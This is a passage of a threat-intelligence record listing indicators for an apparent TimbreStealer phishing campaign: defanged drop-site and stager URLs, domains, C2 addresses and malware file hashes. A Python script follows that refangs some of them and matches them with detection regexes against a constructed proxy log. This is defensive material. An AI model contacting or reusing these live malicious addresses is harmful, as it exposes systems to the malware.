2bf0d056\r\nhxxps://cumplimiento94[.]meinastrohoroskop[.]com/cfdi/bd56529f9d1411\r\nhxxps://cumplimiento98[.]serragrandreunion[.]com/factura/3f209bc16cbb9a\r\nhxxps://factura10[.]miramantolama[.]com/factura/039d9cbaeec9b5\r\nhxxps://factura20[.]facturascorporativas[.]com/seg_factura/9622cf8c695873\r\nhxxps://factura20[.]solunline[.]top/cfdi/6401eac16211b2\r\nhxxps://factura34[.]changjiangys[.]net/facdigital/52490c838bd94f\r\nhxxps://factura4[.]servicioslocomer[.]online/cfdi/f2369d09a54ad9\r\nhxxps://factura40[.]miramantolama[.]com/cfdi/9318466130e6af\r\n
hxxps://factura44[.]servicioslocales[.]online/cfdi/25e8a6f5393e1f\r\nhxxps://factura46[.]facturasfiel[.]com/factura/021bd5fa122bb2\r\nhxxps://factura49[.]marcialledo[.]com/factura/fc2cc5bf671dd0\r\nhxxps://factura50[.]callarlene[.]net/cfdi/867d138f26fb23\r\nhxxps://factura59[.]altavista100[.]com/seg_factura/0179ae05a51830\r\nhxxps://factura7[.]taoshome4sale[.]com/factura/eebf49f810a0a6\r\nhxxps://factura71[.]servicioslomex[.]online/timbreDigital/5de7db415c7e8e\r\nhxxps://factura72[.]serragrandreunion[.]com/seg_factura/728423dceff50c\r\nhxxps://factura73[.]mariageorgina[.]com/cfdi/71deea8cdbcb10\r\nhxxps://factura81[.]altavista100[.]com/factura/8421cd5cb1c8e4\r\nhxxps://factura90[.]changjiangys[.]net/timbreDigital/029a6531330379\r\nhxxps://factura91[.]servicioslocomer[.]online/timbreDigital/2952b54a9542f1\r\nhxxps://folio24[.]serragrandreunion[.]com/seg_factura/548b685f48dd30\r\nhxxps://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc\r\nhxxps://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282\r\nhxxps://folio53[.]mariageorgina[.]com/seg_factura/ca2fd939c046fa\r\nhxxps://folio60[.]callarlene[.]net/seg_factura/367b377baf47e5\r\nhxxps://folio75[.]taoshome4sale[.]com/cfdi/7482bf3f2690af\r\nhxxps://folio75[.]venagard[.]com/cfdi/7718efe0fd3952\r\nhxxps://folio76[.]miramantolama[.]com/cfdi/a74b25b75c7182\r\nhxxps://folio83[.]altavista100[.]com/factura/20f00b7d569c85\r\nhxxps://folio89[.]changjiangys[.]net/factura/b645784e80f71a\r\nhxxps://folio90[.]servicioslocomer[.]online/facdigital/d1950dc8f24757\r\nhxxps://folio99[.]solunline[.]top/facdigital/b7928d4e0eade5\r\nhxxps://pdf21[.]changjiangys[.]net/cfdi/2f99e7adf61c47\r\nhxxps://pdf33[.]venagard[.]com/timbreDigital/91849e7d9fe4ad\r\n
hxxps://pdf34[.]solucionpiens[.]top/seg_factura/2dfed5bc7fcbf6\r\nhxxps://pdf39[.]facturasonlinemx[.]com/seg_factura/66971f3669145a\r\nhxxps://pdf49[.]marcialledo[.]com/factura/729c18972d690c\r\nhxxps://pdf50[.]changjiangys[.]net/factura/cdb5ed3876c4bf\r\nhxxps://pdf57[.]visual8298[.]top/factura/5239e15a8324ab\r\nhxxps://pdf59[.]venagard[.]com/cfdi/5791bf23c6929e\r\nhxxps://pdf63[.]paulfenelon[.]com/timbreDigital/3ae250718da0ca\r\nhxxps://pdf65[.]verificatutramite[.]com/facdigital/e1ec8098e50a0b\r\nhxxps://pdf70[.]mariageorgina[.]com/cfdi/fab1264f158f44\r\nhxxps://pdf81[.]photographyride[.]com/seg_factura/4eb3832fe6d1bd\r\nhxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977\r\nhxxps://pdf93[.]venagard[.]com/factura/f24a53f8932b3f\r\nhxxps://pdf98[.]solunline[.]top/timbreDigital/f57e558c31a86e\r\nhxxps://portal27[.]marcialledo[.]com/timbreDigital/f8a5f05b3c1651\r\nhxxps://portal34[.]solunline[.]top/cfdi/a068bb0da7eea1\r\nhxxps://portal48[.]solucionpiens[.]top/timbreDigital/15ec5fc2aaf26a\r\nhxxps://portal50[.]solucionegos[.]top/factura/8d4c6f7e2a4c7f\r\nhxxps://portal55[.]solucionegos[.]top/seg_factura/f5f59070b20629\r\nhxxps://portal63[.]paulfenelon[.]com/seg_factura/77907fa76c7c59\r\nhxxps://portal70[.]solunline[.]top/timbreDigital/92b380d91a67a0\r\nhxxps://portal80[.]changjiangys[.]net/cfdi/2224782a3b7f1d\r\nhxxps://portal86[.]serragrandreunion[.]com/facdigital/68da4282591283\r\nhxxps://portal90[.]meinastrohoroskop[.]com/factura/64f247c6238c38\r\nhxxps://portal92[.]solucionpiens[.]top/timbreDigital/34893de446d532\r\nhxxps://suscripcion0[.]venagard[.]com/timbreDigital/5c86c63ca1ffda\r\nhxxps://suscripcion10[.]solunline[.]xyz/facdigital/ebe0cb51090e51\r\n
hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508\r\nhxxps://suscripcion24[.]venagard[.]com/timbreDigital/50c6f1fad17f5e\r\nhxxps://suscripcion32[.]servicioslocomer[.]online/facdigital/22ccd8880c217e\r\nhxxps://suscripcion38[.]eagleservice[.]buzz/cfdi/6dadfe1a18cffc\r\nhxxps://suscripcion38[.]mariageorgina[.]com/factura/9c787623800b5e\r\nhxxps://suscripcion57[.]changjiangys[.]net/factura/22ad73593f724a\r\nhxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5\r\nhxxps://suscripcion84[.]taoshome4sale[.]com/cfdi/e4af3e6e22a8a6\r\nhxxps://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb\r\nhxxps://timbrado0[.]meinastrohoroskop[.]com/cfdi/515c9b9087c737\r\nhxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9\r\nhxxps://timbrado16[.]taoshome4sale[.]com/timbreDigital/259029c9d7f330\r\nhxxps://timbrado17[.]marcialledo[.]com/factura/2ea580ee99d5f1\r\nhxxps://timbrado17[.]mariageorgina[.]com/seg_factura/95a6c2c0e004d8\r\nhxxps://timbrado2[.]serviciosna[.]top/facdigital/c5cb33d68be323\r\nhxxps://timbrado2[.]solucionegos[.]top/seg_factura/7c867709e85c67\r\nhxxps://timbrado33[.]meinastrohoroskop[.]com/timbreDigital/aaf2cc575db42c\r\nhxxps://timbrado42[.]mariageorgina[.]com/facdigital/f0f82ab0c87b32\r\nhxxps://timbrado54[.]changjiangys[.]net/cfdi/04e4e38338d82a\r\nhxxps://timbrado6[.]meinastrohoroskop[.]com/cfdi/5290b37e80850a\r\nhxxps://timbrado73[.]mariageorgina[.]com/timbreDigital/ff862f9245e8b6\r\nhxxps://timbrado74[.]callarlene[.]net/timbreDigital/eb52e334a2c0b3\r\nhxxps://timbrado74[.]mexicofacturacion[.]com/factura/14fcb6e3eaf351\r\nhxxps://timbrado80[.]paulfenelon[.]com/timbreDigital/684bc3f7d7e7f9\r\nhxxps://timbrado84[.]miramantolama[.]com/cfdi/18864dcecc9e9c\r\nhxxps://timbrado90[.]porcesososo[.]online/factura/cde31eb6fcac1d\r\n
hxxps://timbrado96[.]paulfenelon[.]com/facdigital/ef18828525a8fb\r\nhxxps://validacion22[.]hb56[.]cc/seg_factura/8f845f6ba70820\r\nhxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2\u0026w=Windows%2010\r\nhxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9\u0026w=Windows%2010\r\nhxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2\u0026w=Windows%2010\r\nhxxps://manderlyx[.]com/cruto/it.php?f=2\u0026w=Windows%2010\r\nhxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2\u0026w=Windows%2010\r\nDomains\r\ntrilivok[.]com\r\nchidoriland[.]com\r\nmanderlyx[.]com\r\nbailandolambada[.]com\r\n0[.]solucionegos[.]top\r\nauditoria38[.]meinastrohoroskop[.]com\r\nauditoria42[.]altavista100[.]com\r\nauditoria67[.]mariageorgina[.]com\r\nauditoria7[.]miramantolama[.]com\r\nauditoria82[.]taoshome4sale[.]com\r\nauditoria84[.]meinastrohoroskop[.]com\r\nauditoria88[.]mariageorgina[.]com\r\nauditoria89[.]venagard[.]com\r\nauditoria92[.]venagard[.]com\r\nauditoria93[.]serragrandreunion[.]com\r\ncomprobante14[.]miramantolama[.]com\r\ncomprobante2[.]marcialledo[.]com\r\ncomprobante27[.]mariageorgina[.]com\r\n
comprobante27[.]serragrandreunion[.]com\r\ncomprobante27[.]servicioslocomer[.]online\r\ncomprobante45[.]altavista100[.]com\r\ncomprobante51[.]meinastrohoroskop[.]com\r\ncomprobante63[.]serragrandreunion[.]com\r\ncomprobante68[.]portafoliocfdi[.]com\r\ncomprobante70[.]miramantolama[.]com\r\ncomprobante75[.]meinastrohoroskop[.]com\r\ncomprobante80[.]serragrandreunion[.]com\r\ncomprobante91[.]servicioslocomer[.]online\r\ncomprobante93[.]venagard[.]com\r\ncumplimiento19[.]altavista100[.]com\r\ncumplimiento35[.]solucionegos[.]top\r\ncumplimiento39[.]meinastrohoroskop[.]com\r\ncumplimiento43[.]commerxion[.]buzz\r\ncumplimiento47[.]solucionegos[.]top\r\ncumplimiento48[.]callarlene[.]net\r\ncumplimiento56[.]timbradoelectronico[.]com\r\ncumplimiento72[.]serragrandreunion[.]com\r\ncumplimiento81[.]paulfenelon[.]com\r\ncumplimiento91[.]miramantolama[.]com\r\ncumplimiento94[.]meinastrohoroskop[.]com\r\ncumplimiento98[.]serragrandreunion[.]com\r\nfactura10[.]miramantolama[.]com\r\nfactura20[.]facturascorporativas[.]com\r\nfactura20[.]solunline[.]top\r\n
factura34[.]changjiangys[.]net\r\nfactura4[.]servicioslocomer[.]online\r\nfactura40[.]miramantolama[.]com\r\nfactura44[.]servicioslocales[.]online\r\nfactura46[.]facturasfiel[.]com\r\nfactura49[.]marcialledo[.]com\r\nfactura50[.]callarlene[.]net\r\nfactura59[.]altavista100[.]com\r\nfactura7[.]taoshome4sale[.]com\r\nfactura71[.]servicioslomex[.]online\r\nfactura72[.]serragrandreunion[.]com\r\nfactura73[.]mariageorgina[.]com\r\nfactura81[.]altavista100[.]com\r\nfactura90[.]changjiangys[.]net\r\nfactura91[.]servicioslocomer[.]online\r\nfolio24[.]serragrandreunion[.]com\r\nfolio24[.]spacefordailyrituals[.]com\r\nfolio47[.]marcialledo[.]com\r\nfolio53[.]mariageorgina[.]com\r\nfolio60[.]callarlene[.]net\r\nfolio75[.]taoshome4sale[.]com\r\nfolio75[.]venagard[.]com\r\nfolio76[.]miramantolama[.]com\r\nfolio83[.]altavista100[.]com\r\nfolio89[.]changjiangys[.]net\r\nfolio90[.]servicioslocomer[.]online\r\nfolio99[.]solunline[.]top\r\npdf21[.]changjiangys[.]net\r\npdf33[.]venagard[.]com\r\npdf34[.]solucionpiens[.]top\r\npdf39[.]facturasonlinemx[.]com\r\npdf43[.]marcialledo[.]com\r\npdf49[.]marcialledo[.]com\r\npdf50[.]changjiangys[.]net\r\npdf57[.]visual8298[.]top\r\npdf59[.]venagard[.]com\r\npdf63[.]paulfenelon[.]com\r\npdf65[.]verificatutramite[.]com\r\npdf70[.]mariageorgina[.]com\r\npdf81[.]photographyride[.]com\r\npdf85[.]miramantolama[.]com\r\npdf93[.]venagard[.]com\r\npdf98[.]solunline[.]top\r\nportal27[.]marcialledo[.]com\r\nportal34[.]solunline[.]top\r\nportal48[.]solucionpiens[.]top\r\nportal50[.]solucionegos[.]top\r\nportal55[.]solucionegos[.]top\r\nportal63[.]paulfenelon[.]com\r\nportal70[.]solunline[.]top\r\nportal80[.]changjiangys[.]net\r\nportal86[.]serragrandreunion[.]com\r\n
portal90[.]meinastrohoroskop[.]com\r\nportal92[.]solucionpiens[.]top\r\nsuscripcion0[.]venagard[.]com\r\nsuscripcion10[.]solunline[.]xyz\r\nsuscripcion24[.]facturasonlinemx[.]com\r\nsuscripcion24[.]venagard[.]com\r\nsuscripcion32[.]servicioslocomer[.]online\r\nsuscripcion38[.]eagleservice[.]buzz\r\nsuscripcion38[.]mariageorgina[.]com\r\nsuscripcion57[.]changjiangys[.]net\r\nsuscripcion65[.]g1ooseradas[.]buzz\r\nsuscripcion84[.]taoshome4sale[.]com\r\nsuscripcion95[.]servicioslomex[.]online\r\ntimbrado0[.]meinastrohoroskop[.]com\r\ntimbrado11[.]verificatutramite[.]com\r\ntimbrado16[.]taoshome4sale[.]com\r\ntimbrado17[.]marcialledo[.]com\r\ntimbrado17[.]mariageorgina[.]com\r\ntimbrado2[.]serviciosna[.]top\r\ntimbrado2[.]solucionegos[.]top\r\ntimbrado33[.]meinastrohoroskop[.]com\r\ntimbrado42[.]mariageorgina[.]com\r\ntimbrado54[.]changjiangys[.]net\r\ntimbrado6[.]meinastrohoroskop[.]com\r\ntimbrado73[.]mariageorgina[.]com\r\ntimbrado74[.]callarlene[.]net\r\ntimbrado74[.]mexicofacturacion[.]com\r\ntimbrado80[.]paulfenelon[.]com\r\ntimbrado84[.]miramantolama[.]com\r\ntimbrado90[.]porcesososo[.]online\r\ntimbrado96[.]paulfenelon[.]com\r\nvalidacion22[.]hb56[.]cc\r\nJavaScript Files\r\n600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f  (Downloader)\r\n883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215  (Region check and redirect)\r\n.URL Files\r\nb1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7  CFDI_930209.zip\r\ne04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f  FACTURA_560208.zip\r\naa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af  FAC_560208_ATR890126GK2.url_\r\n66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791  FAC_930209_FME140910KI4.url_\r\nEmbedded Binaries\r\nb3f4b207ee83b748f3ae83b90d1536f9c5321a84d9064dc9745683a93e5ec405  
Cecujujajofubo475.dll_\r\ne87325f4347f66b21b19cfb21c51fbf99ead6b63e1796fcb57cd2260bd720929  blob.dll_\r\n103d3e03ce4295737ef9b2b9dfef425d93238a09b1eb738ac0e05da0c6c50028  blob.dll_\r\na579bd30e9ee7984489af95cffb2e8e6877873fd881aa18d7f5a2177d76f7bf2  blob.dll\r\nb01e917dd14c780cb52cafcd14e4dd499c33822c7776d084d29cf5e0bb0bddb6  blob.dll_\r\n795c0b82b37d339ea27014d73ad8f2d28c5066a7ceb6a2aa0d74188df9c311c9  blob.dll_\r\n07521bd6acf725b8a33d1d91fd0cc7830d2cff66abdb24616c2076b63d3f36a8  blob.dll_\r\n71ce48c89b22e99356c464c1541e2d7b9419a2c8fe8f6058914fc58703ba244f  blob.dll_\r\nba7bc4cff098f49d39e16c224e001bd40a5d08048aeec531f771a54ee4a5ecef  blob.dll_\r\nDropper Binaries\r\n010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb\r\n024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762\r\n03cd17df83a7bdf459f16677560e69143d1788ce1fc7927200a09f82859d90ea\r\n075910c802f755d3178a8f1f14ee4cd7924fd4463c7491277bdf2681b16e593c\r\n12bff33da7d9807252bb461d65828154b9b5b1dca505e8173893e3d410d40dd0\r\n1aaa4fb29a88c83495de80893cd2476484af561bb29e8cdfc73ce38f6cd61a84\r\n23b9e4103141d6a898773b1342269334e569bcf576cdcb4a905f24e26320cdab\r\n27c1e41fde9bc0d5027a48ccada1af8c9c8f59937bf5f77edd21e49bd28f29a2\r\n2a225784289f31adbaa8be0b8770495fa8950fce2b7352a0c7a566fc79067547\r\n2a38b75e88f91f9cd28ef478e82c3b44f50e57cb958ba63e58f134d8bd368812\r\n2a3f869e9e78b4d7945a60ceec27586c07bc8b0770be64463358fffe3b6b7395\r\n2e04c36b7ddd6939b7bef258bfeba6f91a5c37a43389dd6d9a88eff5863df5ed\r\n43e99539e4b966dde2f9de8dc1ffb4a22bc560e54c01de9aef6b15fac1412714\r\n46226d4fb7ffe15ba8167e3724f991c543731672e19ef40bb43fddc6df648d0a\r\n46cc07a9287da26e238a74734d87e0aae984f4648a80a26547afa0de8c850afb\r\n51be3a3b4ebd15c305c0f9b57388c449f88f0d6d2d46a0a838f046f0fd21b78f\r\n55b0247b9b574978a4c9abd19c3bcc04ea78598398b9f8aeb35bd51cbd877576\r\n56612bb0ab00cbb7af24326b027a55ff25852ddab1f1c8e24471b7ce97003505\r
\n5831f4f8ce715d4a021284e68af1b6d8040a2543484ac84b326eea20c543552e\r\n58562e49c1612f08e56e7d7b3ca6cd78285948018b2998e45bd425b4c79ce1f4\r\n62495620b0d65d94bc3d68dec00ffbe607eacd20ab43dc4471170aa292cc9b1a\r\n682546addb38a938982f0f715b27b4ba5cda4621e63f872f19110d174851c4e9\r\n69019b7b64deb5cc91a58b6a3c5e6b1b6d6665bd40be1381a70690ba2b305790\r\n6bf082f001f914824a6b33f9bdd56d562c081097692221fb887035e80926d583\r\n7923d409959acffab49dda63c7c9c15e1bdd2b5c16f7fcfe8ef3e3108e08df87\r\n7ac22989021082b9a377dcc582812693ce0733e973686b607e8fc2b52dcf181d\r\n8420d77ba61925b03a1ad6c900a528ecacbb2c816b3e6bc62def40fc14e03b78\r\n850dd47a0fb5e8b2b4358bf3aa1abd7ebaae577b6fc4b6b4e3d7533313c845b8\r\n96363b2b9e4ed8044cb90b6619842ba8897b4392f9025cbfdccfda1ea7a14a58\r\n97157c8bbeb8769770c4cb2201638d9ad0103ba2fdfed9bdbd03c53bd7a5fcb9\r\na103b0c604ef32e7aabb16c2a7917fd123c41486d8e0a4f43dcf6c48d76de425\r\na82fb82f3aa2f6123d2c0fb954ae558ac6e8862ef756b12136fbe8d533b30573\r\na92934c014a7859bd122717f4c87f6bd31896cb87d28c9fac1a6af57ff8110f6\r\nab2a2465fccd7294580c11492c29a943c54415e0c606f41e08ce86d69e254ee4\r\nababe815e11b762089180e5fb0b1eaffa6a035d630d7aaf1d8060bd5d9a87ea5\r\nb04a0a4a1520c905007a5d370ed2b6c7cb42253f4722cc55a9e475ae9ece1de7\r\nc29b9f79b0a34948bde1dfca3acecca6965795917c7d3444fcacba12f583fb98\r\nc99237a5777a2e8fa7da33460a5b477d155cc26bc2e297a8563516a708323ead\r\nca652fc3a664a772dbf615abfe5df99d9c35f6a869043cf75736e6492fbd4bea\r\nb5a272acd842154b2069b60aab52568bbfde60e59717190c71e787e336598912\r\n5efa99b3cb17bec76fec2724bcfcc6423d0231bba9cf9c1aed63005e4c3c2875\r\nce135a7e0410314126cacb2a2dba3d6d4c17d6ee672c57c097816d64eb427735\r\nd3ff98b196717e66213ccf009cbeed32250da0e2c2748d44f4ee8fb4f704407c\r\n35b7dd775db142699228d3e64ee8e9a02c6d91bb49f7c2faf367df8ba2186fd6\r\ne65e25aee5947747f471407a6cce9137695e4fee820f990883b117726195988c\r\ne8ed09b016ea62058404c482edf988f14a87c790d5c9bd3d2e03885b818ef
822\r\nfebf9c5ede3964fdb3b53307a3d5ef7b0e222705a3bb39bef58e28aaba5eed28\r\nff3769c95b8a5cdcba750fda5bbbb92ef79177e3de6dc1143186e893e68d45a4\r\nSource: https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/"
	],
	"report_names": [
		"timbrestealer-campaign-targets-mexican-users"
	],
	"threat_actors": [
	],
	"ts_created_at": 1775439127,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/658e0f6fd16ab07688366e37c17cfd418a0e4e59.pdf",
		"text": "https://archive.orkl.eu/658e0f6fd16ab07688366e37c17cfd418a0e4e59.txt",
		"img": "https://archive.orkl.eu/658e0f6fd16ab07688366e37c17cfd418a0e4e59.jpg"
	}
}
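The coverage section above lists vendor signatures (Snort SIDs, ClamAV names) but gives teams without those products nothing to run. What follows is an added example, written for this corpus page and not part of the Talos post or its GitHub IOC repository: a small Python matcher that refangs a handful of the published IOCs, generalises the naming scheme visible in the Drop Site URL list (a Spanish billing word plus a number as the first hostname label, one of five invoice-themed path words, then a 14-character hex token) and the `~word<digits>/` C2 path and `it.php?f=<n>&w=Windows%2010` stager request into regular expressions, and runs both the exact set and the patterns over a constructed proxy log. The sample log lines, the `.example` hostnames, the verdict labels and the assumption that future infrastructure keeps the same naming scheme are mine; only the defanged IOC strings are copied from the list above.

```python
import re
from urllib.parse import urlsplit

# Defanged IOCs copied verbatim from the Talos list (a subset, enough to exercise
# each matcher). Everything else in this file is an illustrative assumption.
DROP_SITE_IOCS = [
    "hxxps://auditoria38[.]meinastrohoroskop[.]com/factura/b5b0c16b999573",
    "hxxps://comprobante68[.]portafoliocfdi[.]com/seg_factura/58c0146a753186",
    "hxxps://0[.]solucionegos[.]top/timbreDigital/e99522f778ea6a",
    "hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010",
]
C2_URL_IOCS = [
    "hxxps://hamster69[.]senac2021[.]org/~armadillo492370/",
    "hxxps://69[.]64[.]35[.]1/~route649289/",
]
C2_IP_IOCS = ["24[.]199[.]98[.]128", "159[.]89[.]50[.]225"]


def refang(ioc: str) -> str:
    """Reverse the hxxp:// and [.] defanging used in the published list."""
    return re.sub(r"^hxxp", "http", ioc.replace("[.]", "."), flags=re.IGNORECASE)


# Exact-match sets, normalised the way a proxy log presents them.
KNOWN_URLS = {refang(u).rstrip("/") for u in DROP_SITE_IOCS + C2_URL_IOCS}
KNOWN_HOSTS = {refang(ip) for ip in C2_IP_IOCS} | {urlsplit(u).hostname for u in KNOWN_URLS}

# Structural patterns generalised from the listed URLs. Assumption: the actor
# keeps the same naming scheme when it rotates to new domains.
DROP_HOST_RE = re.compile(
    r"^(?:auditoria|comprobante|cumplimiento|factura|folio|pdf|portal"
    r"|suscripcion|timbrado|validacion)\d{1,2}\."
)
DROP_PATH_RE = re.compile(r"^/(?:facdigital|seg_factura|factura|cfdi|timbreDigital)/[0-9a-f]{14}$")
C2_PATH_RE = re.compile(r"^/~[a-z]+\d{6}/?$")
STAGER_PATH_RE = re.compile(r"/it\.php$")


def classify(url: str):
    """Return a verdict label for one URL, or None when nothing matches."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if url.rstrip("/") in KNOWN_URLS or host in KNOWN_HOSTS:
        return "exact-ioc"
    if DROP_HOST_RE.match(host) and DROP_PATH_RE.match(parts.path):
        return "dropsite-pattern"
    if C2_PATH_RE.match(parts.path):
        return "c2-pattern"
    if STAGER_PATH_RE.search(parts.path) and "w=Windows" in parts.query:
        return "stager-pattern"
    return None


URL_IN_LINE_RE = re.compile(r"https?://[^\s\"']+")


def scan_proxy_log(lines):
    """Return (line_no, verdict, url) for every URL in the log that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in URL_IN_LINE_RE.findall(line):
            verdict = classify(url)
            if verdict:
                hits.append((n, verdict, url))
    return hits


# Constructed sample proxy log (not real traffic). Hosts outside the IOC list
# use reserved .example names so nothing here resolves.
SAMPLE_LOG = [
    "2024-02-20T10:01:02Z 10.0.0.5 GET https://auditoria38.meinastrohoroskop.com/factura/b5b0c16b999573 200",
    "2024-02-20T10:01:09Z 10.0.0.5 GET https://portal12.invoice-lure.example/cfdi/0123456789abcd 200",
    "2024-02-20T10:02:30Z 10.0.0.7 GET https://intranet.example/factura/q1-report.pdf 200",
    "2024-02-20T10:03:11Z 10.0.0.5 POST https://24.199.98.128/~route649289/ 200",
    "2024-02-20T10:03:40Z 10.0.0.9 GET https://stager.example/abc/it.php?f=2&w=Windows%2010 200",
    "2024-02-20T10:04:00Z 10.0.0.9 GET https://updates.example/~docs123456/ 200",
]

if __name__ == "__main__":
    for n, verdict, url in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {verdict:17} {url}")
```

The exact set is what you load into a proxy or DNS blocklist; the pattern verdicts are for hunting, since a legitimate internal invoicing host could in principle use a `/factura/` path, so treat `dropsite-pattern` hits as leads to pivot on (was the path token 14 hex characters, was the TLS certificate freshly issued, did the client then contact a `~word<digits>/` URL), not as blocks.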